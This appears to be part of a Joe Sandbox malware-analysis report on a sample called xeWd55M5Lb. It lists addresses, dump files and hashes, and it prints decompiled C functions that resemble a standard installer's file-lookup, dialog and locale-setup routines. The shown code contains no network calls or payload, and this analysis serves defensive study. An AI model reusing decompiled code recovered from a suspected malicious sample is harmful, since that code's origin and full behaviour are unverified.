0x00406eac
0x00406df8
0x00406dfc
0x00407569
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e1a
0x00000000
0x00406e1a
0x00406ea6
0x00406daf
0x00406be3
0x00406be3
0x00406bec
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x00000000
0x004073c8
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00000000
0x0040753b
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x00000000
0x00407390
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040699E(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}

0x004069a9
0x004069b2
0x00000000
0x004069bf
0x004069b5
0x00000000

APIs

FindFirstFileW.KERNELBASE(7620FAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,7620FAA0,?,7620F560,00405D94,?,7620FAA0,7620F560), ref: 004069A9
FindClose.KERNEL32(00000000), ref: 004069B5

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC

Uniqueness

Uniqueness Score: -1.00%

Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t145;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x423730 = _t34;
					if(_t130 == 0x110) {
						 *0x42a268 = _t127;
						 *0x423744 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t91;
						E004045C4(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
						 *0x42922c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a280;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404610(0x40b);
						while(1) {
							_t36 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x42a284;
							if(_t38 ==  *0x42a284) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a284; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045C4(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ec - _t136;
							_v28 = _t48;
							if( *0x42a2ec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x421710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ec - _t136;
							if( *0x42a2ec == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004045F9();
							E00406668(0x423748, E004040A6());
							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423748);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238);
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x429238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L63;
									}
									ShowWindow( *0x429238, 8);
									E00404610(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ec - _t136;
								if( *0x42a2ec != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2e0 - _t136;
								if( *0x42a2e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x429238); // executed
						 *0x42a268 = _t136;
						EndDialog(_t127,  *0x421f18);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x429238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ec - _t136;
											if( *0x42a2ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421f18 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421f18 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x429238);
						 *0x429238 = _t122;
						L60:
						_t145 =  *0x425748 - _t136; // 0x0
						if(_t145 == 0 &&  *0x429238 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x425748 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040462B(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}

0x004040d0
0x004040d7
0x0040423e
0x00404242
0x00404246
0x00404248
0x0040424d
0x00404258
0x00404263
0x00404268
0x0040426a
0x0040426c
0x0040426f
0x00404274
0x00404282
0x0040428f
0x00404296
0x00404296
0x00404297
0x00404297
0x0040429c
0x004042a2
0x004042a9
0x004042af
0x004042b1
0x004042f1
0x004042f6
0x004042fb
0x004042fb
0x00404300
0x00404309
0x0040430b
0x00404310
0x00404316
0x0040431a
0x0040431a
0x0040431f
0x00404325
0x00000000
0x00000000
0x00404330
0x00404336
0x00000000
0x00000000
0x0040433f
0x00404347
0x0040434c
0x0040434f
0x00404355
0x0040435a
0x0040435d
0x00404363
0x00404368
0x0040436b
0x00404371
0x00404379
0x0040437f
0x00404385
0x00404389
0x00404390
0x00404390
0x00404390
0x0040439a
0x004043ac
0x004043b8
0x004043bd
0x004043c7
0x004043cd
0x004043cf
0x004043d4
0x004043d1
0x004043d1
0x004043d1
0x004043e4
0x004043fc
0x004043fe
0x00404404
0x00404419
0x00404406
0x0040440f
0x00404411
0x00404411
0x0040441f
0x00404430
0x00404446
0x0040444d
0x00404453
0x00404457
0x0040445c
0x0040445e
0x00000000
0x00404464
0x00404464
0x00404466
0x00000000
0x00000000
0x0040446c
0x00404470
0x00404495
0x0040449b
0x004044a1
0x004044a3
0x00000000
0x00000000
0x004044c9
0x004044cf
0x004044d1
0x004044d6
0x00000000
0x00000000
0x004044dc
0x004044df
0x004044e2
0x004044f9
0x00404505
0x0040451e
0x00404524
0x00404528
0x0040452d
0x00404533
0x00000000
0x00000000
0x0040453d
0x00404548
0x00000000
0x00404548
0x00404472
0x00404478
0x00000000
0x00000000
0x0040447e
0x00404484
0x00000000
0x00000000
0x00000000
0x0040448a
0x0040445e
0x00404555
0x00404561
0x00404568
0x00000000
0x004042b3
0x004042b3
0x004042b6
0x004042e9
0x004042e9
0x004042eb
0x00000000
0x00000000
0x00000000
0x004042eb
0x004042b8
0x004042bc
0x004042c1
0x004042c3
0x00000000
0x00000000
0x004042d3
0x004042db
0x00000000
0x004042e1
0x004040e9
0x004040e9
0x004040ed
0x004040f2
0x00404101
0x00404101
0x00404107
0x0040410e
0x00404152
0x00404158
0x00404171
0x00404174
0x00404187
0x0040418d
0x00000000
0x00000000
0x00404193
0x0040419e
0x004041a0
0x004041a2
0x004041c1
0x004041c1
0x004041c4
0x004041c9
0x004041cc
0x004041dc
0x004041dd
0x004041df
0x00404215
0x00404225
0x00000000
0x00404225
0x004041e1
0x004041e7
0x00404200
0x00404205
0x00404207
0x00000000
0x00000000
0x00404209
0x004041f5
0x004041f5
0x004041f7
0x004041f7
0x00000000
0x004041f7
0x004041ea
0x004041ef
0x00000000
0x004041ef
0x004041ce
0x004041d4
0x00000000
0x00000000
0x004041d6
0x00000000
0x004041d6
0x004041c6
0x00000000
0x004041c6
0x004041ac
0x004041b3
0x004041b9
0x004041bb
0x00404591
0x00000000
0x00404591
0x00000000
0x004041bb
0x00404179
0x00000000
0x00404181
0x00404160
0x00404166
0x0040456e
0x0040456e
0x00404574
0x00404581
0x00404587
0x00404587
0x00000000
0x00404110
0x00404115
0x00404121
0x0040412a
0x0040422b
0x00000000
0x00404149
0x0040414c
0x00000000
0x0040414c
0x0040412a
0x0040410e

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
ShowWindow.USER32(?), ref: 00404121
GetWindowLongW.USER32(?,000000F0), ref: 00404133
ShowWindow.USER32(?,00000004), ref: 0040414C
DestroyWindow.USER32 ref: 00404160
SetWindowLongW.USER32 ref: 00404179
GetDlgItem.USER32 ref: 00404198
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
IsWindowEnabled.USER32(00000000), ref: 004041B3
GetDlgItem.USER32 ref: 0040425E
GetDlgItem.USER32 ref: 00404268
KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
GetDlgItem.USER32 ref: 00404379
ShowWindow.USER32(00000000,?), ref: 0040439A
EnableWindow.USER32(?,?), ref: 004043AC
EnableWindow.USER32(?,?), ref: 004043C7
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
EnableMenuItem.USER32 ref: 004043E4
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
SetWindowTextW.USER32(?,00423748), ref: 0040444D
ShowWindow.USER32(?,0000000A), ref: 00404581

Strings

H7B, xrefs: 00404429

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: H7B
API String ID: 2475350683-2300413410
Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403D17 Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403D17(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a270;
				_t22 = E00406A35(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					_t73 =  *_t22(); // executed
					E004065AF(L"1033", _t73 & 0x0000ffff);
				}
				E00403FED(_t78, _t90);
				_t86 = L"C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x42a2e0 =  *0x42a278 & 0x00000020;
				 *0x42a2fc = 0x10000;
				if(E0040603F(_t90, L"C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040603F(_t98, _t86) == 0) {
						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FED(_t78, __eflags);
							__eflags =  *0x42a300;
							if( *0x42a300 != 0) {
								_t33 = E0040579D(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5); // executed
							_t39 = E004069C5("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069C5("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
							E00403C67(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
